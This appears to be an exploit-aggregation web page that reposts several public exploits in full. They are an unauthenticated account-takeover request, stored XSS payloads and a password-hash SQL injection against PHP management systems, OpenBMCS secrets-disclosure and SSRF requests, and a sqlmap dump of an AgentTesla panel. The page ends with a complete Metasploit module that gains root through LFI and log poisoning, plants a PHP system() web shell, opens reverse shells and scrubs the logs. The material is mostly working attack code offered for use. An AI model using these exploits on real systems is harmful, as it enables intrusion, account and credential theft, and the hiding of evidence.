Latest exploits :: CodePwn

<pre><code>#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated) #Date: 11/01/2022 #Exploit Author: Himash #Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip #Version: 1.0 #Tested on: Kali Linux Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "email", "password" and "cpass" parameters. #Steps to Reproduce 1. Send the below POST request by changing "id", "email", "password" and "cpass" parameters. 2. Log in to the user account by changed email and password. POST /odlms/classes/Users.php?f=save_client HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673 Content-Length: 1551 Origin: http://localhost Connection: close Referer: http://localhost/odlms/?page=user Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="id" 2 -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="firstname" Claire -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="middlename" C -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="lastname" Blake -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="gender" Female -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="dob" 1997-10-14 -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="contact" 09456789123 -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="address" Sample Address only -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="email" test@test.com -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="password" Test@1234 -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="cpass" Test@1234 -----------------------------218422725412817326673495861673 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------218422725412817326673495861673-- </code></pre>

<pre><code># Exploit Title: Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS) # Exploit Author: (Sant268) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Version: HPRMS 1.0 # Tested on: Ubuntu 20, Apache - Description: A Stored XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter. - Payload used: <img src =q onerror=prompt(8)> - Steps to reproduce: 1- Go to http://victim.com/admin/?page=doctors 2- Add a Doctor, paste the payload in specialization 3- Alert will pop whenever the page is accessed. ---- # Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS) # Exploit Author: (Sant268) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Version: HPRMS 1.0 # Tested on: Ubuntu 20, Apache - Description: A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter. - Payload used: <img src =q onerror=prompt(8)> - Steps to reproduce: 1- Go to http://victim.com/admin/?page=room_list 2- Add Room type, paste the payload in description 3- Alert will pop whenever the page is accessed. ---- # Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS) # Exploit Author: (Sant268) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Version: HPRMS 1.0 # Tested on: Ubuntu 20, Apache - Description: A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter. - Payload used: <img src =q onerror=prompt(8)> - Steps to reproduce: 1- Go to http://victim.com/admin/?page=room_types 2- Add Room type, paste the payload in description 3- Alert will pop whenever the page is accessed. </code></pre>

<pre><code># Exploit Title: SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://salonerp.sourceforge.io/ # Software Link: https://sourceforge.net/projects/salonerp/files/latest/download # Version: SalonERP v3.0.1 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: sql # Date: 11/01/2022 ''' DESCRIPTION ======== The vulnerability allows an attacker to inject payload using 'sql' parameter in sql query while generating report. Upon successful discovering the login admin password hash, it can be decrypted and obtained the plain-text password. POC REQUEST: ======== POST /salonerp/report.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 755 Origin: http://127.0.0.1 Connection: close Cookie: salonerp-id=vDF9uCpfqQAXuNhsCWvH; PHPSESSID=e170a8c9dfeef78751cb49b9977b2373 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin save=&title=bestCustomers&font=Times&fontSize=12&sql=SELECT%0A%09%09%09%09%09%09(select+concat(u.name%2C'+'%2Cu.password)+from+Models%5CUser+u+where+u.id+%3D+1)+AS+userpass%2C%0A%09%09%09%09%09%09COUNT(i.id)+AS+amount%2C%0A%09%09%09%09%09%09SUM(i.cash+%2B+i.bank)+as+revenue%0A%09%09%09%09%09FROM+Models%5CInvoice+i%0A%09%09%09%09%09JOIN+i.event+e%0A%09%09%09%09%09JOIN+e.customer+c%0A%09%09%09%09%09WHERE+DATE_DIFF(i.date%2C+%3AstartDate)+%3E%3D+0%0A%09%09%09%09%09AND+DATE_DIFF(i.date%2C+%3AendDate)+%3C%3D+0%0A%09%09%09%09%09GROUP+BY+e.customer%0A%09%09%09%09%09ORDER+BY+revenue+DESC&ask%5B0%5D%5Bname%5D=startDate&ask%5B0%5D%5Bvalue%5D=2021-12-14T00%3A00%3A00&ask%5B1%5D%5Bname%5D=endDate&ask%5B1%5D%5Bvalue%5D=2021-12-15T00%3A00%3A00&currency%5B%5D=2 EXPLOITATION ======== 1. Create a database and login panel 2. Create employees in the settings 3. Create Products, Customers and Events 4. Pay for Products on Event 5. Create report on the "Reports" menu 6. Inject payload to the "sql" parameter in POST request for generate report Payload: (select+concat(u.name,'+',u.password)+from+Models\User+u+where+u.id+=+1)+AS+userpass ''' </code></pre>

<pre><code> OpenBMCS 2.4 Secrets Disclosure Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5695 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php 26.10.2021 -- https://192.168.1.222/debug/ Index of /debug change_password_sqls clear_all_watches.php controllerlog/ dash/ dodgy.php fix_out.php graphics/ graphics_diag.php graphics_ip_diag/ jace_info.php kits/ mysession.php nuke.php obix_test.php print_tree.php reboot_backdoor.php rerunSQLUpdates.php reset_alarm_trigger_times.php system/ test_chris_obix.php timestamp.php tryEmail.php trysms.php unit_testing/ userlog/ ... ... /cache/ /classes/ /config/ /controllers/ /core/ /css/ /display/ /fonts/ /images/ /js/ /php/ /plugins/ /sounds/ /temp/ /tools/ /core/assets/ /core/backup/ /core/crontab/ /core/font/ /core/fonts/ /core/license/ /core/load/ /core/logout/ /core/password/ /php/audit/ /php/phpinfo.php /php/temp/ /php/templates/ /php/test/ /php/weather/ /plugins/alarms/ /tools/phpmyadmin/index.php /tools/migrate.php </code></pre>

<pre><code> OpenBMCS 2.4 Unauthenticated SSRF / RFI Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5694 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php 26.10.2021 -- POST /php/query.php HTTP/1.1 Host: 192.168.1.222 Content-Length: 29 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ip=www.columbia.edu:80&argu=/ HTTP/1.1 302 Found Date: Tue, 14 Dec 2021 20:26:47 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../login.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">  <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" > <meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" /> <title>Columbia University in the City of New York</title> ... ... </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/db9629508fda139f71f625d764c7eff7_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: AgentTesla Builder Web Panel Vulnerability: SQL Injection Description: The AgentTeslaBuilder WebUI uses ionCube to encode and protect its PHP code. However, the parameter 'table' is vulnerable to post-auth SQL Injection. Authenticated users can easily dump all databases, tables and contents including the MySQL database schema. Manually testing the panel I identified an SQL error probing the following URL /AgentTeslaBuilder/server_side/scripts/server_processing.php?table=%27HELL%20OR%201=1 which gave me "An SQL error occurred: SQLSTATE[42S02] Base table or view not found 1146 Table 'agenttesla.'hell or 1=1' doesn't exist" Then switched to use Sqlmap to do the heavy lifting. Database: agenttesla Table: passwords [1 entry] +--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+ | hwid | password_id | pwd | host | status | client | time | pc_name | username | server_time | +--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+ | 939394 | 1 | abc123 | x.x.x.x | 1 | windows | 2022-01-17 01:06:09 | tom | nubarr | 2022-01-17 01:06:09 | +--------+-------------+--------+---------+--------+---------+---------------------+---------+----------+---------------------+ Type: WebUI MD5: db9629508fda139f71f625d764c7eff7 : "Agent Tesla.exe" MD5: 978509c2a3d051b43e53bba1436b7076 : "login.php" Vuln ID: MVID-2022-0455 Disclosure: 01/16/2022 Exploit/PoC: sqlmap.py -u "http://AGENT-TESLA-IP/AgentTeslaBuilder/server_side/scripts/server_processing.php?table=passwords --auth=admin:abc123" --dbms=MySQL --dump Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end end end </code></pre>